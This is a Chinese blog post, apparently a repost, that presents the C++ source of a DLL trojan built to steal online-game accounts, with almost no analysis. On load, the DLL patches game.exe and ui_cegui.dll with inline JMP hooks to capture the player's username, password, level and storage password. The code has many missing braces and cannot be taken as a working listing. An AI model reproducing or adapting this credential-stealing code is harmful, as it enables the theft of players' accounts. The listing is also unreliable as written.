VC++盗号木马源码分析

VC++ 网游dll盗号木马源码2009-09-06 12:19前段时间,在lonkil前辈的网站上看到的一款DLL网游木马源码,确实佩服...(幸亏这类牛人没走这道儿,不然中国网民会死得很惨的~~~~)

/** main.cpp **/

#include <windows.h> 
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C}; 
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; 
BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00}; 
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; 
BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08}; 
BYTE oldStoreCode[6]={0}; 
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; 
DWORD ui_cegui; 
void *lpUserRet=NULL; 
void *lpGradeRet=NULL; 
void *lpStoreRet=NULL; 
char user[40]; 
char pass[40]; 
char storePassWord[40]; 
DWORD dwGrade; 
DWORD stroePath=0; 
void _stdcall StroeUnhook(); 
void _stdcall HookStroe(); 
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule) 

BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName); 
if(hModule==NULL) 

::MessageBox(NULL,"获取模块错误","failed",0); 
return 0; 
}

DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50); 
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
*lpModule=(DWORD)newModule; 
memcpy(newModule,(void*)hModule,imageSize);

for(DWORD i=0;i<imageSize;i++) 

buff=(BYTE*)((DWORD)newModule+i); 
if(memcmp(buff,flag,len)==0) 

   
   *lpRet=(void*)buff; 
   return i+(DWORD)hModule; 
   

   
}

return 0;


DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule) 

BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName);

if(hModule==NULL) 

::MessageBox(NULL,"获取模块错误","failed",0); 
return 0; 

DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50); 
for(DWORD i=0;i<imageSize;i++) 

buff=(BYTE*)(newModule+i); 
if(memcmp(buff,flag,len)==0) 

   
   *lpRet=(void*)buff; 
   return i+(DWORD)hModule; 
   

   

return 0;


void _stdcall GetUserBuff(char *userName,char *passWord) 

strcpy(user,userName); 
strcpy(pass,passWord);

return;


__declspec(naked)void GetUserAndPass() 

_asm 

push eax; 
mov eax,dword ptr ss:[ebp+0xC]; 
push eax; 
push ecx; 
call GetUserBuff; 
call StroeUnhook; 
pop eax; 
jmp [lpUserRet]; 


void _stdcall GetGradeDword(DWORD grade) 

dwGrade=grade; 
return;


__declspec(naked)void GetGrade() 

_asm 

pushad; 
push ebx; 
call GetGradeDword; 
call HookStroe; 
popad; 
jmp [lpGradeRet]; 


void _stdcall StroeUnhook() 

if(stroePath==0) 
return; 
MEMORY_BASIC_INFORMATION mbi; 
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi); 
memcpy((void*)stroePath,oldStoreCode,6); 
VirtualProtect((void*)stroePath,7,mbi.Protect,0); 
return;


void _stdcall GetStoreBuff(char *storePass) 

strcpy(storePassWord,storePass); 
char data[256]; 
wsprintf(data,"用户名:%s/n密码:%s/n等级:%d/n仓库密码:%s/n",user,pass,dwGrade,storePassWord);

::MessageBox(NULL,data,"ok",0);


__declspec(naked)void GetStore() 

_asm 

pushad; 
push ecx; 
call GetStoreBuff; 
call StroeUnhook; 
popad; 
jmp [lpStoreRet]; 
   


void _stdcall HookStroe() 

stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui); 
if(stroePath==0) 
return ; 
stroePath=stroePath+0x43; 
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43); 
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5); 
*(DWORD*)(&storeJmpCode[1])=jmpAddress; 
memcpy(oldStoreCode,(BYTE*)stroePath,6);

MEMORY_BASIC_INFORMATION mbi; 
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi); 
memcpy((void*)stroePath,storeJmpCode,6); 
VirtualProtect((void*)stroePath,7,mbi.Protect,0); 
return;


void HookGrade() 
{

DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui); 
if(passPath==0) 
return ; 
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5); 
*(DWORD*)(&gradeJmpCode[1])=jmpAddress; 
MEMORY_BASIC_INFORMATION mbi; 
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi); 
memcpy((void*)passPath,gradeJmpCode,6); 
VirtualProtect((void*)passPath,7,mbi.Protect,0);


void HookUserAndPass() 

DWORD hModule; 
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule); 
if(passPath==0) 
return ; 
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5); 
*(DWORD*)(&userJmpCode[1])=jmpAddress; 
MEMORY_BASIC_INFORMATION mbi; 
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi); 
memcpy((void*)passPath,userJmpCode,6); 
VirtualProtect((void*)passPath,7,mbi.Protect,0); 

DWORD WINAPI Thread(LPVOID lpParam) 

HookUserAndPass(); 
HookGrade();

return 0; 

BOOL APIENTRY DllMain( HANDLE hModule, 
       DWORD ul_reason_for_call, 
       LPVOID lpReserved 
       ) 
{

switch(ul_reason_for_call) 

case DLL_PROCESS_ATTACH: 

   DWORD ThreadId; 
   CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId); 
   break; 

   
default:break; 
}

return TRUE;

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值